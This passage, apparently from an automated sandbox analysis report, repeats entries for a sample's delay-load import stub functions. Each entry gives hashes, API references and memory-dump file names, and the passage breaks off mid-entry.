    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e6339c1f8d6931d99a6d74abfe45b84fd903ef7f36898f47b4f824b70b814d69
    • Instruction ID: c86e28e438bb8b87f264aea29b1fef46d00fd8afe2592fc09d7e567b9639de18
    • Opcode Fuzzy Hash: e6339c1f8d6931d99a6d74abfe45b84fd903ef7f36898f47b4f824b70b814d69
    • Instruction Fuzzy Hash: 33B01295268143BC374863157E02F7F021EC3C0B10330803FF401D4082D8800D402033
    Function 000CF340 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2b785315b0232b36308c2f5b2eb36b028fbdb7c999bc75f51297bda89af7fd33
    • Instruction ID: 0cfa953cfc3175683157ee93a01a70df49b102cca0509a48bb11fb93152d2584
    • Opcode Fuzzy Hash: 2b785315b0232b36308c2f5b2eb36b028fbdb7c999bc75f51297bda89af7fd33
    • Instruction Fuzzy Hash: 34B01295278543BC374863197E02F7E022EC3C0B10370413FF001D4082D8400D402433
    Function 000CF354 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 20a043d92d28285e3393a826fe8e8bcc9823c7d45ce07cb1ddb9cb748fe1d297
    • Instruction ID: b604d368a5a544719be011ae05179f92ded4d9e132f9c3984d64220df84d5a3c
    • Opcode Fuzzy Hash: 20a043d92d28285e3393a826fe8e8bcc9823c7d45ce07cb1ddb9cb748fe1d297
    • Instruction Fuzzy Hash: 5DB012D5268243BC3B8863153E02F7F025EC3C0B10330413FF401D4082D8800D806033
    Function 000CF368 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6a3d652ab91532d1ac1370e3df7082281116aab302bdf9498f3ef31bbad7f76a
    • Instruction ID: 6769c7ff7aa6c7129440d8df759edd04447f1480d4bbed02ec61df7504df0bc1
    • Opcode Fuzzy Hash: 6a3d652ab91532d1ac1370e3df7082281116aab302bdf9498f3ef31bbad7f76a
    • Instruction Fuzzy Hash: B9B01295268143BC374863153E02F7F022EC3C0B10370403FF001D4082D8800D402133
    Function 000CF37C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4b7f2e711727e331190c285d7e699394d944a6a52ea6eea65377b66b23aa2829
    • Instruction ID: 1f5ee24cdb47fc52f4ab720c6b245c07ee885ff6517dc2d684fcfb1668fcd51e
    • Opcode Fuzzy Hash: 4b7f2e711727e331190c285d7e699394d944a6a52ea6eea65377b66b23aa2829
    • Instruction Fuzzy Hash: 3FB01291278183BC378863153E02F7E021EC3C0B10330813FF401D4182D8500D842033
    Function 000CF372 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0ce0d7961568d2f61cffd7d51bf5bf2a3dbd41c18b9a0763603fefca257d5d26
    • Instruction ID: bc65e34b943573121d580ade046f92e309cbf8e96a015878fd758ff43950c737
    • Opcode Fuzzy Hash: 0ce0d7961568d2f61cffd7d51bf5bf2a3dbd41c18b9a0763603fefca257d5d26
    • Instruction Fuzzy Hash: C5B01291278043BC374863157E02F7E021EC3C1B14330C13FF401D4182D8500D442033
    Function 000CF386 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 67edc68b69f08fd505527bc403df3688dfc5e69b90da50fed306429cb1b252de
    • Instruction ID: d3d4886c8ae427ecd8bbe2fede4a00a7f88977f0fe87f09d1e01c6dce6f93e4a
    • Opcode Fuzzy Hash: 67edc68b69f08fd505527bc403df3688dfc5e69b90da50fed306429cb1b252de
    • Instruction Fuzzy Hash: 78B012913B8043BC374863153F02F7E021EC3C0B10330803FF001D8182D8A10E492033
    Function 000CF39A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2fdb676770c14ddd9388dde1955cc0e705bf00911ae5f5f7e954a02bd96d0561
    • Instruction ID: 9410278cd7e13b9b0a8cff5512b5ab09e18781dee5d0afa0cb13aa1b0cfaf70b
    • Opcode Fuzzy Hash: 2fdb676770c14ddd9388dde1955cc0e705bf00911ae5f5f7e954a02bd96d0561
    • Instruction Fuzzy Hash: 4FB012A1268043BC374863157E02F7E025EC3C0B10330803FF401D4082D9400E402033
    Function 000CF390 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 675183bcb00a46e268f9c4e5034b6b16366a0065ebcd36c7a0dea096a13a0124
    • Instruction ID: 41201e311449218be04fb62c9d980134f2fcefd2101353b775f42e4d5710b649
    • Opcode Fuzzy Hash: 675183bcb00a46e268f9c4e5034b6b16366a0065ebcd36c7a0dea096a13a0124
    • Instruction Fuzzy Hash: 23B01291278043BC374863553E02F7E031EC3C0B10370843FF001D4182D8500D442033
    Function 000CF3AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3107f7e1004f7bb49e6b7ba68262ab6bff6af3e68d719e4f52e26326b1a3311c
    • Instruction ID: fed7fca736aade25c89b915a0f3f48c35d3702de7224a1fcbc1643a016c598bd
    • Opcode Fuzzy Hash: 3107f7e1004f7bb49e6b7ba68262ab6bff6af3e68d719e4f52e26326b1a3311c
    • Instruction Fuzzy Hash: 87B012A12A8043BC374863153F02F7E021EC3C0B10330403FF001D8082D9810F412033
    Function 000CF3B8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3ea54e68cffdf05d5be5415ce4452148efeeadaf28dbc2cc472f2692866e740a
    • Instruction ID: 287d0d9c8a7645929036e900af011c40d33194a118029ca24181787d5219b359
    • Opcode Fuzzy Hash: 3ea54e68cffdf05d5be5415ce4452148efeeadaf28dbc2cc472f2692866e740a
    • Instruction Fuzzy Hash: 00B012A1268043BC374863163E02F7E021EC3C0B10370403FF001D8082D9400E402033
    Function 000CF3CC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: babd15b70835086cf7b9aaaf6f83b88b884235afc00b2aed896ec6e99223484b
    • Instruction ID: 85d3f39e4913adc4117ac1beb646a0e892adc628e40a9c1812ed263c40858877
    • Opcode Fuzzy Hash: babd15b70835086cf7b9aaaf6f83b88b884235afc00b2aed896ec6e99223484b
    • Instruction Fuzzy Hash: 5BB092A126A142BC268863152A12F7E021AC2C0B20330413FB401D4082D84009802032
    Function 000CF3D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a65c7cfa3e3bb37a022be9d631804df61b77547c74f479d060190c00011fd8ef
    • Instruction ID: 3b14683efc6d979b009bebf1cbc2d5853bf75ae5a25f2b9b1258e787966583d1
    • Opcode Fuzzy Hash: a65c7cfa3e3bb37a022be9d631804df61b77547c74f479d060190c00011fd8ef
    • Instruction Fuzzy Hash: C3B092952AA042BC268862152A16F7E021AC2C0B20330403FB001D8082D8810A412032
    Function 000CF3EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3a3444869f3b21fbdc25c58f940cf18f97ac6244aca1c90bb565726c488951b9
    • Instruction ID: 3a15bcbbe9cb408b3fe79669588218a727adfcee946559ac8ddd7a3fe82792fe
    • Opcode Fuzzy Hash: 3a3444869f3b21fbdc25c58f940cf18f97ac6244aca1c90bb565726c488951b9
    • Instruction Fuzzy Hash: D6B012D1268043BC374863657E02F7E025EC3C0B10330803FF501D4082D9400D402033
    Function 000CF3E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e2ba617f507d8033a956ac65067cdd402b4da0a390c6b1cae899be6a190db62c
    • Instruction ID: 279a4a66d6b9bdde483a226205a9f6581c99d695149d8eff4ac1c73a0adfa4d0
    • Opcode Fuzzy Hash: e2ba617f507d8033a956ac65067cdd402b4da0a390c6b1cae899be6a190db62c
    • Instruction Fuzzy Hash: 3BB09291269042BC768862152A12F7E025AC6C0B20370403FB001D4082D84009402032
    Function 000CF3FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1584a17132b7ce1ea7027b1eb1a35ffd0cfb931c6cd944bc5c0ee207c1225c3b
    • Instruction ID: 6726fb3a73254f74c8ef12b1d15787636226b2c75a7ce77c59a3f8a87ae14641
